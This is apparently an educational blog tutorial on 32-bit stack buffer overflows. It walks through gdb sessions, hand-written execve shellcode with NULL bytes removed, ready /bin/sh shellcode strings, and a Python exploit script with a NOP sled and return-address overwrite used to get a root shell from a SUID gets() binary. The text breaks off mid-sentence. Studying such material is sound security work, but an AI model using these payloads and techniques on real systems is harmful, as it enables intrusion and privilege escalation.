Buffer overflow attack is a great example of how simple software “anomaly” can lead to complete system vulnerablity. This is a well known security issue, so nothing new here. For the sake of the ones not familiar with it and for the cyberpunk.rs’s completness in general, we’re going to cover the subject with a simple and frequently used examples, shellcode writing, priviledge escalation, prevention mechanisms, etc. This article contains mixed info based on a personal experience and various online sources.
In short, Buffer Overflow is a situation in which program starts to write data outside the pre-defined buffer, overwritting the adjecent memory locations and re-defining process/program behaviour. Ultimately this can be used to force the program to execute a custom piece of code which can further lead to anything (complete system access)
Whether you’re curious about the CyberSecurity or a developer trying to improve your CyberSec awareness, understanding Buffer Overflow is a great way to get a quick and in depth view of potential dangers out there, a vital step in mitigating such vulnerabilities.
It might be a good idea to overview GDB, Assembly Basics and Stack Structure Overview before proceeding.
Related articles:
Content:
- Buffer Overflow & Stack Details
- Buffer OverFlow Basic Example
- ShellCode: Rough Approach
- ShellCode: Execve (11)
- ShelCode: Issues (NULLs & Relative addressing)
- Example: Simple injection I
- Example: Simple injection II
- Examples: HackYou & ExploitMe
- [Anti] Prevention
- Conclusion
Buffer Overflow & Stack Details
Number of situations can lead to Buffer Overflow like usage of unsafe types and functions, insecurely copying or accessing buffer, etc. For instance, list of naturally harmful/vulnerable functions (C/C++):
– gets
– getws
– sprintf
– strcat
– strcpy
– strncpy
– scanf
– memcpy
– memmove
Using something like:
char buffer[8];
gets(buffer);
Can lead to buffer overflow since gets
doesn’t check the input size. As mentioned, buffers are pieces of memory for data storage. Stack is used for static memory allocation. Heap is used for dynamic memory allocation. Consequently, overflow can be divided in a couple of types:
stack overflow
: char name[10] = “CyberPunk”;heap overflow
: int *ptr = new int;Index/Integer overflow
: int arr[10];
Buffer allocation:
HIGH 12 | | | \0| k | 8 | n | u | P | r | 4 | e | b | y | C | 0 | | | | | LOW
Now, if you extend the input and insert something larger than the buffer itself, it’s going to overwrite adjacent memory locations, affecting the overall program/process execution. Most frequent reasons for this type of vulnerabilities is related to development process (or even developers them selves, practices, unawareness, etc), usage of previously mentioned unsafe functions that don’t cover array bounds / type-safety checking, implementing buffer copying (without size verification), different compiler configurations and situations in which buffer is being placed near vital or critical data structures in memory, etc. Stack frame:
HIGH
|----------------|
| | -> Command line arguments & environment vars
|----------------|
| STACK | -> Growing downwards !
|----------------|
| |
| |
| |
|----------------|
| HEAP | -> Growing upwards !
|----------------|
| bss | -> UnInitialized Vars
|----------------|
| Data | -> Initialized Vars
|----------------|
| Text |
|----------------|
LOW
Most compilers/OSs nowdays provide various overflow checking options during the compile/link process, even during the runtime, various prevention techniques and principles, but not all of them are fully safe and are vulnerable to exploitation and/or circumvention.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
int num=33; //STACK
int *ptr = new int; //HEAP
char mybuffer[5]; //STACK
if (argc < 2)
{
printf("You need some parameter!\n");
exit(0);
}
strcpy(mybuffer, argv[1]);
printf("mybuffer content= %s\n", mybuffer);
return 0;
}
Before we turn to buffer overflow example, a stack sketch.
HIGH |----------------| ------------ f1 start | Param2 | 12 (%EBP) |----------------| | Param1 | 8 (%EBP) |----------------| | RET | 4 (%EBP) |----------------| | EBP | --> points to previous / main's frame (%EBP) |----------------| | local vars | -4 (%EBP) |----------------| ------------ f1 end (ESP) LOW
Function call stack structure (vulnerable strcpy):
Above illustration was taken from Henry Casanova’s course on Buffer Overflow, a great visual representation on what happens behind the scene during the function call.
chmod u+s <filename>
Buffer Overflow Basic Example
Here we’re going to play around with the buffer and call an “UnreachableFunction” just by manipulating RET pointer. Before we continue some useful gcc flags:
-ggdb
: producing debugging information specifically intended for gdb-mpreferred-stack-boundary=2
: Changing the stack pointer alignment to 4 bytes boundary ( 2^2, default: 4 => 2^4 => 16 bytes)-m32
: compile 32 bit obj, useful on 64 bit systems-fno-stack-protector
: disables stack protection, canaries-z execstack
: Passed to the linker, enabling “executable stack” (opposite, noexecstack)-no-pie
: tell gcc not to make a Position Independent Executable (PIE). PIE is a pre-condition for ASLR (Address Space Layout Randomization), a kernel’s security feature to load binary and its dependencies into a random VM (Virtual Memory) location each time it’s run.-Wl,-z,norelro
: disables a read-only relocation table area in the final ELF (executable and linkable format) where all relocations are resolved at run-time. [RELocation Read Only].-static
: On some system it overrides the pie and prevents share library linking [ might be unncecessary ], no dynamic linking happening
Take this “simple” program that reads input and prints it out:
#include <stdio.h> void UnreachableFunction(){ printf("This shouldn't be executed!"); } void ReadInput() { char buffer[8]; gets(buffer); puts(buffer); } int main() { ReadInput(); return 0; }
We can try and illustate the stack of this function:
HIGH |----------------| ------------ ReadInput start | | 8 (%EBP) |----------------| | RET | 4 (%EBP) => Main functions return 0 |----------------| | EBP | --> points to previous / main's frame (%EBP) |----------------| | local vars | -4 (%EBP) => buffer[8] | | |----------------| ------------ ReadInput end (ESP) LOW
$ gcc -ggdb -mpreferred-stack-boundary=2 -o bufferoverflow bufferoverflow.c
Boundary set to 2, so it’s a 4 bytes alignment. If we test the above program:
$ gdb bufferoverflow (gdb) list 2 3 void UnreachableFunction(){ 4 printf("This shouldn't be executed!"); 5 } 6 7 void ReadInput() 8 { 9 char buffer[8]; 10 gets(buffer); 11 puts(buffer); (gdb) 12 } 13 14 int main() 15 { 16 ReadInput(); 17 return 0; 18 } (gdb) break 16 Breakpoint 1 at 0x121b: file bufferoverflow.c, line 16. (gdb) break 10 Breakpoint 2 at 0x11f0: file bufferoverflow.c, line 10. (gdb) break 11 Breakpoint 3 at 0x11fc: file bufferoverflow.c, line 11. (gdb) disas main Dump of assembler code for function main: 0x0000120e <+0>: push %ebp 0x0000120f <+1>: mov %esp,%ebp 0x00001211 <+3>: call 0x1227 <__x86.get_pc_thunk.ax> 0x00001216 <+8>: add $0x2dea,%eax 0x0000121b <+13>: call 0x11de 0x00001220 <+18>: mov $0x0,%eax 0x00001225 <+23>: pop %ebp 0x00001226 <+24>: ret End of assembler dump. (gdb) disas ReadInput Dump of assembler code for function ReadInput: 0x000011de <+0>: push %ebp 0x000011df <+1>: mov %esp,%ebp 0x000011e1 <+3>: push %ebx 0x000011e2 <+4>: sub $0x8,%esp 0x000011e5 <+7>: call 0x10c0 <__x86.get_pc_thunk.bx> 0x000011ea <+12>: add $0x2e16,%ebx 0x000011f0 <+18>: lea -0xc(%ebp),%eax 0x000011f3 <+21>: push %eax 0x000011f4 <+22>: call 0x1040 0x000011f9 <+27>: add $0x4,%esp 0x000011fc <+30>: lea -0xc(%ebp),%eax 0x000011ff <+33>: push %eax 0x00001200 <+34>: call 0x1050 0x00001205 <+39>: add $0x4,%esp 0x00001208 <+42>: nop 0x00001209 <+43>: mov -0x4(%ebp),%ebx 0x0000120c <+46>: leave 0x0000120d <+47>: ret End of assembler dump. (gdb) run Starting program: /root/TEST_AREA/bufferoverflow/bufferoverflow Breakpoint 1, main () at bufferoverflow.c:16 16 ReadInput(); (gdb) x/8xw $esp 0xbffff2e8: 0x00000000 0xb7dfa7e1 0x00000001 0xbffff384 0xbffff2f8: 0xbffff38c 0xbffff314 0x00000001 0x00000000 (gdb) s Breakpoint 2, ReadInput () at bufferoverflow.c:10 10 gets(buffer); (gdb) x/8xw $esp 0xbffff2d4: 0x00000000 0x00000000 0x00000000 0xbffff2e8 0xbffff2e4: 0x00401220 0x00000000 0xb7dfa7e1 0x00000001
The “sub $0x8,%esp” reservers the space for the buffer.
Stack looks like this:
HIGH |----------------| ------------ f1 start | | 8 (%EBP) |----------------| | RET | 4 (%EBP) => 0x00401220 (Main) |----------------| | EBP | 0 (%EBP) => 0xbffff2e8 |----------------| | local vars | -4 (%EBP) => 0x00000000 | | 0x00000000 | | 0x00000000 |----------------| ------------ f1 end (ESP) LOW
Continuing execution:
(gdb) c Continuing. 123456789abcdef Breakpoint 3, ReadInput () at bufferoverflow.c:11 11 puts(buffer); (gdb) x/8xw $esp 0xbffff2d4: 0x34333231 0x38373635 0x63626139 0x00666564 0xbffff2e4: 0x00401220 0x00000000 0xb7dfa7e1 0x00000001 (gdb) c Continuing. 123456789abcdef [Inferior 1 (process 2449) exited normally]
The 0x00666564 are basically “fed” (inverted, endian thing).
So, now we have the stack looking like:
HIGH |----------------| ------------ f1 start | | 8 (%EBP) |----------------| | RET | 4 (%EBP) => 0x00401220 (Main) |----------------| | EBP | 0 (%EBP) => 0x00666564 |----------------| | local vars | -4 (%EBP) => 0x63626139 | | 0x38373635 | | 0x34333231 |----------------| ------------ f1 end (ESP) LOW
Although we’ve overwritten the EBP, RET is intact and program is still holding. Adding another char (123456789abcdefg) and strangely things start to go downhill:
(gdb) x/8xw $esp 0xbffff2d4: 0x34333231 0x38373635 0x63626139 0x67666564 0xbffff2e4: 0x00401200 0x00000000 0xb7dfa7e1 0x00000001 (gdb) c Continuing. 123456789abcdefg Program received signal SIGSEGV, Segmentation fault. 0x00401050 in puts@plt ()
Ok, now, what if we would like to reach the “UnreachableFunction()”? Let’s see:
(gdb) disas UnreachableFunction Dump of assembler code for function UnreachableFunction: 0x004011b9 <+0>: push %ebp 0x004011ba <+1>: mov %esp,%ebp 0x004011bc <+3>: push %ebx 0x004011bd <+4>: call 0x401227 <__x86.get_pc_thunk.ax> 0x004011c2 <+9>: add $0x2e3e,%eax 0x004011c7 <+14>: lea -0x1ff8(%eax),%edx 0x004011cd <+20>: push %edx 0x004011ce <+21>: mov %eax,%ebx 0x004011d0 <+23>: call 0x401030 0x004011d5 <+28>: add $0x4,%esp 0x004011d8 <+31>: nop 0x004011d9 <+32>: mov -0x4(%ebp),%ebx 0x004011dc <+35>: leave 0x004011dd <+36>: ret End of assembler dump.
Let’s try it:
$ printf "123456789abcdefg\xb9\x11\x40" | ./bufferoverflow
123456789abcdefg�@
Segmentation fault
We might be missing the ‘\n’:
void UnreachableFunction(){ printf("This shouldn't be executed!\n"); }
$ printf "123456789abcdefg\xb9\x11\x40" | ./bufferoverflow
123456789abcdefg�@
Illegal instruction
Adding exit(0):
void UnreachableFunction(){ printf("This shouldn't be executed!\n"); exit(0); }
..and yes, finally we’re landing where we should:
$ printf "123456789abcdefg\xb9\x11\x40" | ./bufferoverflow
123456789abcdefg�@
This shouldn't be executed!
This can/should be debugged and you could do it by placing the input value into a into file:
$ printf "123456789abcdefg\xb9\x11\x40" > input
and then calling that file within gdb:
(gdb) run < input
ShellCode: Rough Approach
As we saw in the previous example, by acquiring the access to RET (Return Address) we can point execution to basically anything, e.g. some of our executable payload. That payload if nothing more than a machine code executed by CPU and that payload is what is being called Shellcode. Most often that code is being used to get access to shell, thus enging up with that name. Take a small example of exit call:
#include <stdlib.h> int main() { exit(0); }
By disassembling this we can see the core of it:
$ gdb main (gdb) disas _exit Dump of assembler code for function _exit: 0x0806bffa <+0>: mov 0x4(%esp),%ebx 0x0806bffe <+4>: mov $0xfc,%eax 0x0806c003 <+9>: call *%gs:0x10 0x0806c00a <+16>: mov $0x1,%eax 0x0806c00f <+21>: int $0x80 0x0806c011 <+23>: hlt End of assembler dump.
We can build a ShellCode of this:
.text .globl _start _start : movl $20, %ebx ; STATUS movl $1, %eax ; EXIT_SYSTEM_CALL int $0x80 ; INTERRUPT
Assemble this:
$ as -o ExitSC.o ExitSC.s
and link it:
$ ld -o ExitSC ExitSC.o
Dump it:
$ objdump -d ExitSC ExitSC : file format elf32-i386 Disassembly of section .text: 08049000 <_start>: 8049000: bb 14 00 00 00 mov $0x14,%ebx 8049005: b8 01 00 00 00 mov $0x1,%eax 804900a: cd 80 int $0x80
Write this into a code:
#include <stdio.h> char shellcode[] = "\xbb\x14\x00\x00\x00" "\xb8\x01\x00\x00\x00" "\xcd\x80"; int main (){ }
Compile it and verify status. Don’t forget execstack (Segmentation Fault might occur without it):
$ gcc -ggdb -z execstack -mpreferred-stack-boundary=2 -o ShellCode ShellCode.c $ ./ShellCode $ echo $? 20
Ok, now, extend it:
#include <stdio.h> char shellcode[] = "\xbb\x14\x00\x00\x00" "\xb8\x01\x00\x00\x00" "\xcd\x80"; int main (){ int *ret; ret = (int *) &ret +2; (*ret) = (int)shellcode; }
Run GDB and break at line “ret = (int *) &ret +2” :
(gdb) run Starting program: /cyberpunk/TEST_AREA/bufferoverflow/ShellCode Breakpoint 1, main () at ShellCode.c:9 9 ret = (int *) &ret +2; (gdb) x/8xw $esp 0xbffff304: 0xb7fb3000 0x00000000 0xb7dfa7e1 0x00000001 0xbffff314: 0xbffff3a4 0xbffff3ac 0xbffff334 0x00000001 (gdb) print /x ret $1 = 0xb7fb3000
Checking the Return Address:
$ disas 0xb7dfa7e1 Dump of assembler code for function __libc_start_main: 0xb7dfa6f0 <+0>: call 0xb7f14a69 <__x86.get_pc_thunk.ax> 0xb7dfa6f5 <+5>: add $0x1b890b,%eax
The libc is responsible for setting up the enviroment of a program before calling the main function and when main returns, libc cleans it. If we take a closer look at ret = (int *) &ret +2
:
- &ret : location where the ret is stored (top of the stack => 0xb7fb3000)
- +2 : add 2 integer values or 8 bytes, making the ret point to RET (0xb7dfa7e1)
The next line (*ret) = (int)shellcode
simply replaces the value of RET (0xb7dfa7e1) with the address of our shellcode. Continuing the execution:
(gdb) s 10 (*ret) = (int)shellcode; (gdb) x/8xw $esp 0xbffff304: 0xbffff30c 0x00000000 0xb7dfa7e1 0x00000001 0xbffff314: 0xbffff3a4 0xbffff3ac 0xbffff334 0x00000001 (gdb)
(gdb) print &shellcode $2 = (char (*)[13]) 0x404018 (gdb) s 11 } (gdb) x/8xw $esp 0xbffff304: 0xbffff30c 0x00000000 0x00404018 0x00000001 0xbffff314: 0xbffff3a4 0xbffff3ac 0xbffff334 0x00000001
Shellcode: execve (11)
By checking the man pages, the execve (system call #11) executes a new program:
int execve ( const char *filename, char *const argv[], char *const enpv[] );
With that in mind, the C code (equivalent) that spawns a new shell would look something like:
#include <stdio.h> #include <stdlib.h> int main () { char *args[2]; args[0]="/bin/bash"; args[1]=NULL; execve(args[0], args, NULL); exit(0); }
Compile it:
$ gcc -static -z execstack -mpreferred-stack-boundary=2 -o shell shell.c $ gdb shell (gdb) disas main Dump of assembler code for function main: 0x08049b05 <+0>: push %ebp 0x08049b06 <+1>: mov %esp,%ebp 0x08049b08 <+3>: push %ebx 0x08049b09 <+4>: sub $0x8,%esp 0x08049b0c <+7>: call 0x80499e0 <__x86.get_pc_thunk.bx> 0x08049b11 <+12>: add $0x914ef,%ebx 0x08049b17 <+18>: lea -0x2dff8(%ebx),%eax 0x08049b1d <+24>: mov %eax,-0xc(%ebp) 0x08049b20 <+27>: movl $0x0,-0x8(%ebp) 0x08049b27 <+34>: mov -0xc(%ebp),%eax 0x08049b2a <+37>: push $0x0 0x08049b2c <+39>: lea -0xc(%ebp),%edx 0x08049b2f <+42>: push %edx 0x08049b30 <+43>: push %eax 0x08049b31 <+44>: call 0x806c030 0x08049b36 <+49>: add $0xc,%esp 0x08049b39 <+52>: push $0x0 0x08049b3b <+54>: call 0x8050050 End of assembler dump.
As you can see, it’s a bit “messed” up with the additional code (__x86.get_pc_thunk.bx). To make it more readable you can try compiling it with -fno-pic
(not using position-independend code [PIC]):
$ gcc -static -fno-pic -z execstack -mpreferred-stack-boundary=2 -o shell shell.c
Now, doing the disassembling provides a bit cleaner code:
(gdb) disas main Dump of assembler code for function main: 0x08049b05 <+0>: push %ebp 0x08049b06 <+1>: mov %esp,%ebp 0x08049b08 <+3>: sub $0x8,%esp 0x08049b0b <+6>: movl $0x80ad008,-0x8(%ebp) 0x08049b12 <+13>: movl $0x0,-0x4(%ebp) 0x08049b19 <+20>: mov -0x8(%ebp),%eax 0x08049b1c <+23>: push $0x0 0x08049b1e <+25>: lea -0x8(%ebp),%edx 0x08049b21 <+28>: push %edx 0x08049b22 <+29>: push %eax 0x08049b23 <+30>: call 0x806c030 0x08049b28 <+35>: add $0xc,%esp 0x08049b2b <+38>: push $0x0 0x08049b2d <+40>: call 0x8050050 End of assembler dump.
Let’s try and illustrate the stack by checking the code:
HIGH |----------------| | | |----------------| | EBP old | 1. push %ebp |----------------| <--- EBP 2. mov %esp,%ebp | 0 / NULL | 5. movl $0x0,-0x4(%ebp) |----------------| 6. mov -0x8(%ebp),%eax | P( /bin/bash) | <--- 6. EAX, 8. EDX 4. movl $0x80ad008,-0x8(%ebp) |----------------| 3. sub $0x8,%esp | 0 / NULL | 7. push $0x0 |----------------| | EDX | 9. push %edx |----------------| 8. lea -0x8(%ebp),%edx | EAX | 10. push %eax |----------------| <--- ESP LOW
(1) push the EBP on to the stack, (2) moving the EBP to the top of the stack / ESP, (3) moving the ESP 8 bytes down, (4) moving 0x80ad008 content 8 bytes below EBP. Further inspection of the addr “0x80ad008“:
$ (gdb) x/1s 0x80ad008
0x80ad008: "/bin/bash"
(5) Setting 0 (NULL) 4 bytes below EBP, (6) moving/copying the word 8 bytes below EBP to EAX => “/bin/bash”, (7) pushing 0 (NULL) to stack, (8) placing a reference to word 8 bytes below EBP to EDX => “/bin/bash” , (9) pushing the EDX to stack, (10) pushing the EAX to stack
Building the shellcode:
.data bash: .asciz "/bin/bash" null1: .int 0 bashAddress: .int 0 null2: .int 0 .text .globl _start _start: movl $bash, bashAddress ; pointer to bash => bashAddress addr movl $11, %eax ; EAX = 11 (sys call for execve) movl $bash, %ebx ; bash pointer / string addr => EBX movl $bashAddress , %ecx ; pointer of array of arguments => ECX movl $null2, %edx ; env pointer array => no envp / NULL int $0x80 exit: movl $10, %ebx movl $1, %eax int $0x80
The data is basically strucutred like an array of pointers, sequentially positioned in memory. Looking at the function:
int execve ( const char *filename, char *const argv[], char *const enpv[] );
EAX
: excve (syscall 11)EBX
: filename pointer (/bin/bash)ECX
: arguments [ “/bin/bash”, NULL]EDX
: [NULL]
Interrupt at the end (0x80) triggers the execution. Assemble this:
$ as -ggstabs -o shell.o shell.s
and link it:
$ ld -o shell shell.o
Inspect it:
$ objdump -d shell shell: file format elf32-i386 Disassembly of section .text: 08049000 <_start>: 8049000: c7 05 0e a0 04 08 00 movl $0x804a000,0x804a00e 8049007: a0 04 08 804900a: b8 0b 00 00 00 mov $0xb,%eax 804900f: bb 00 a0 04 08 mov $0x804a000,%ebx 8049014: b9 0e a0 04 08 mov $0x804a00e,%ecx 8049019: ba 12 a0 04 08 mov $0x804a012,%edx 804901e: cd 80 int $0x80 08049020 : 8049020: bb 0a 00 00 00 mov $0xa,%ebx 8049025: b8 01 00 00 00 mov $0x1,%eax 804902a: cd 80 int $0x80
The 0x804a000 contains the string. Alignment maybe looks messed up, but all vars are packed in 22 bytes:
(gdb) x/8xw 0x804a000 0x804a000: 0x6e69622f 0x7361622f 0x00000068 0xa0000000 0x804a010: 0x00000804 0x00000000 0x0000001c 0x00000002 6e 69 62 2f 73 61 62 2f 68 00 n i b / s a b / h => /bin/bash
Since they’re sequentially placed:
- bash is at 0x804a000 (9 chars/bytes + zero byte)
- null1 is at 0x804a00a (4 bytes), val : 0x00000000
- bashAddress is at 0x804a00e (4 bytes), val : 0x0804a000
- null2 is at 0x804a012 (4 bytes), val: 00000000
ShellCode: Issues
There are a couple of problems when it comes to shellcode.
Shellcode can’t contain NULLs (“0”) and looking at the our (“shell”) objdump shell code, there are a lot of zeros (00). They signify the end of the string (char buf) and can’t be used as is. Solution
: replace NULL values
The second issue is that the values/addresses are hardcoded
so it will not work on all systems. Solution
: use relative addressing
We’ll start with the solution right away:
.data .globl _start _start : jump CustomJump ShellCode: popl %esi xorl %eax, %eax movb %al, 0x9(%esi) ; replace A with 0 movl %esi, 0xa(%esi) ; pointer to bash on AAAA movl %eax, 0xe(%esi) ; place a 0 on BBBB movb $11, %al ; eax => 11 (syscall, execve) movl %esi, %ebx ; ebx => bash string leal 0xa(%esi), %ecx ; ecx => argv [ bash, null] leal 0xe(%esi), %edx ; edx => envp [ null ] int $0x80 CustomJump: call ShellCode ShellVars: .ascii "/bin/bashABBBBCCCC"
This approach is excluding “null” values and using relative addressing. When we jump to “CustomJump” and call “ShellCode”, ESI contains the next instruction which is our ascii variable. So, we’re relying on ESI for relative addressing.
| filename | argv | / b i n / b a s h A B B B B C C C C | | | | ESI 0x9 0xA 0xE
We’re immediatelly replacing the “A” with 0 (al, 1 lower byte). If we check the function “Execve” call:
int execve ( const char *filename, char *const argv[], char *const enpv[] );
syscall
: EAX => 11filename (string)
: EBX => ESI (/bin/bash)argv (pointer to file)
: EXC => 0xA (BBBBCCCC)enpv
: EDX => 0xE (BBBB)
Compared to previous example, this pretty efficient. Instead of 22 bytes, we’re now using 18 bytes, we’re not using a NULLs (0’s) and it has relative addressing. We’re not done. Assemble, link and dump it:
$ as -o shellclean.o shellclean.s $ ld -o shellclean shellclean.o $ objdump -D shellclean shellclean: file format elf32-i386 Disassembly of section .data: 08049000 <_start>: 8049000: eb 18 jmp 804901a 08049002 : 8049002: 5e pop %esi 8049003: 31 c0 xor %eax,%eax 8049005: 88 46 09 mov %al,0x9(%esi) 8049008: 89 76 0a mov %esi,0xa(%esi) 804900b: 89 46 0e mov %eax,0xe(%esi) 804900e: b0 0b mov $0xb,%al 8049010: 89 f3 mov %esi,%ebx 8049012: 8d 4e 0a lea 0xa(%esi),%ecx 8049015: 8d 56 0e lea 0xe(%esi),%edx 8049018: cd 80 int $0x80 0804901a : 804901a: e8 e3 ff ff ff call 8049002 0804901f : 804901f: 2f das 8049020: 62 69 6e bound %ebp,0x6e(%ecx) 8049023: 2f das 8049024: 62 61 73 bound %esp,0x73(%ecx) 8049027: 68 41 42 42 42 push $0x42424241 804902c: 42 inc %edx 804902d: 43 inc %ebx 804902e: 43 inc %ebx 804902f: 43 inc %ebx 8049030: 43 inc %ebx
As we can see, there are no NULLs. As before, proceed converting this shellcode to C. To avoid “manually” doing this, find some helper functions out there (bash or some scripts), e.g.:
$ for i in $(objdump -D shellclean -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo \xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43
We’re using -D (forcing disassembly of all sections), but you can or should be able to use -d (only code sections).
#include <stdio.h> char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89" "\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d\x56\x0e" "\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f" "\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"; int main (){ int *ret; ret = (int *) &ret +2; (*ret) = (int)shellcode; }
$ gcc -ggdb -z execstack -mpreferred-stack-boundary=2 -o ShellShellCode ShellClean.c
Buffer overflow attack: Example I
The gets()
function might be easy to overflow, but it can be tricky to get a shell since that function closes/exists after the input. We’ll go over that.
#include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> int main(int argc, char **argv) { char buffer[64]; gets(buffer); return 0; }
$ gcc -ggdb -mpreferred-stack-boundary=2 -o simple1 simple1.c
Running this with more than 64 chars:
$ python -c "print 'A' * 100" | ./simple1 Segmentation fault
Finding the buffer size with Metasploit
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A (gdb) run Starting program: /root/TEST_AREA/bufferoverflow/program/sample1 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A Program received signal SIGSEGV, Segmentation fault. 0x33634132 in ?? ()
Crashing at 0x33634132. Find the offset:
$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 33634132 [*] Exact match at offset 68
Disassemble:
(gdb) disas main Dump of assembler code for function main: 0x00001199 <+0>: push %ebp 0x0000119a <+1>: mov %esp,%ebp 0x0000119c <+3>: sub $0x40,%esp 0x0000119f <+6>: lea -0x40(%ebp),%eax 0x000011a2 <+9>: push %eax 0x000011a3 <+10>: call 0x11a4 0x000011a8 <+15>: add $0x4,%esp 0x000011ab <+18>: mov $0x0,%eax 0x000011b0 <+23>: leave 0x000011b1 <+24>: ret End of assembler dump.
Set a breakpoint on leave (0x000011b0):
(gdb) break *0x000011b0 Breakpoint 1 at 0x11b0: file sample1.c, line 11. (gdb) run Starting program: /home/cyberpunk/buffer_overflow/sample1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (gdb) info frame Stack level 0, frame at 0xbffff300: eip = 0x4011b0 in main (sample1.c:11); saved eip = 0xb7dfa7e1 source language c. Arglist at 0xbffff2f8, args: argc=1, argv=0xbffff394 Locals at 0xbffff2f8, Previous frame's sp is 0xbffff300 Saved registers: ebp at 0xbffff2f8, eip at 0xbffff2fc (gdb) x/24wx $esp 0xbffff2b8: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff2c8: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff2d8: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff2e8: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff2f8: 0x00414141 0xb7dfa7e1 0x00000001 0xbffff394 0xbffff308: 0xbffff39c 0xbffff324 0x00000001 0x00000000
Measuring the distance between buffer start and EIP will give us the buffer size:
0xbffff2fc – 0xbffff2b8 = 44 (Decimal: 68)
Find some shellcode that executes/calls some shell (/bin/sh):
\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80
gets() buffer overflow [py struct]
We’re trying to generate the following order of things on stack:
--------------- PAD PAD PAD PAD PAD PAD PAD PAD buffer [64] PAD PAD PAD PAD --------------- PAD PAD EBP RET ------ NOP NOP NOP NOP | NOP NOP NOP NOP <------ NOP NOP NOP NOP SHL SHL SHL SHL SHL SHL SHL SHL
You can decide to place everything within the buffer (if it fits), move things aroung, different variations, but the general idea as always is to overwrite EBP/RET and reach the shellcode. Start with this script/exploit (sample1.py):
import struct pad = "\x41" * 68 RET = "ABCD" shellcode = "AAAA" NOP = "\x90" * 16 print pad + RET + NOP + shellcode
Instead of 64 we set padding to 68, overwriting the EBP as well (+4 bytes). To check if RET is approprite we left RET=ABCD (0x44434241):
(gdb) run <<< $(python sample1.py) Starting program: /home/cyberpunk/sample1 <<< $(python sample1.py) /bin/bash: warning: command substitution: ignored null byte in input Program received signal SIGSEGV, Segmentation fault. 0x44434241 in ?? () (gdb) x/24xw $esp 0xbffff710: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff720: 0x99580b6a 0x2d686652 0x68e78963 0x6868732f 0xbffff730: 0x6e69622f 0xe852e389 0x69622f08 0x68732f6e 0xbffff740: 0xe1895357 0x000080cd 0x00000000 0x00000000 0xbffff750: 0x00000000 0x080db000 0x080db000 0x080db000 0xbffff760: 0x00000000 0x99ef2a7c 0x6f44cb13 0x00000000
As expected, the order of things is exactly right. We can also see the NOP address to which we should jump (0xbffff710). Go ahead an correct the sample1.py replacing ABCD with 0xbffff710. Instead of dealing with endian thing use “struct.pack” which appropriately sets the order of bytes, RET = struct.pack(“I”, 0xbffff710).
Ok, before we turn to Gets() buffer overflow ShellCode, we should probably mention a number of issues you might experience.
First one
, and we’ll place in a note on this as well, is the situation in which ShellCode exits before we reach a shell, the “exited normally”:
(gdb) run <<< $(python sample1.py) Starting program: /home/cyberpunk/sample1 <<< $(python sample1.py) process 21393 is executing new program: /usr/bin/dash [Inferior 1 (process 21393) exited normally] or via terminal: $ python sample1.py | sample1 $
After explot is executed, gets() closes everything and nothing happens. No shell access. We need to find a way to keep that stdin open and one frequently mentioned approach is by leaving cat open:
$ (python sample1.py;cat)|./sample1 whoami root
Second one is ShellCode not executing as the owner. The SUID(0) thing might not work even if you set the chmod u+s <executable>. There were suggestions to add setuid(0) explictly (does work, but not realistic), to check /proc/mounts and move the file to a path not having nosuid, etc. but almost none mentiones that the exploit / ShellCode itself should be handling this.
For e.g. you might use plain excve(/bin/sh) ShellCode that works fine with strcpy():
8048060: 31 c0 xor %eax,%eax 8048062: 50 push %eax 8048063: 68 2f 2f 73 68 push $0x68732f2f 8048068: 68 2f 62 69 6e push $0x6e69622f 804806d: 89 e3 mov %esp,%ebx 804806f: 89 c1 mov %eax,%ecx 8048071: 89 c2 mov %eax,%edx 8048073: b0 0b mov $0xb,%al 8048075: cd 80 int $0x80 8048077: 31 c0 xor %eax,%eax 8048079: 40 inc %eax 804807a: cd 80 int $0x80 shellcode = "" shellcode += "\x31\xc0\x50\x68\x2f\x2f\x73" shellcode += "\x68\x68\x2f\x62\x69\x6e\x89" shellcode += "\xe3\x89\xc1\x89\xc2\xb0\x0b" shellcode += "\xcd\x80\x31\xc0\x40\xcd\x80"
but you’ll end up with no root access with gets():
$ (python sample1.py;cat)|./sample1 whoami cyberpunk
So, you must keep in mind the ShellCode type/operations, adjusting/changing them based on a situation at hand. The one below sets UID before calling a shell (30 bytes, exploit-db):
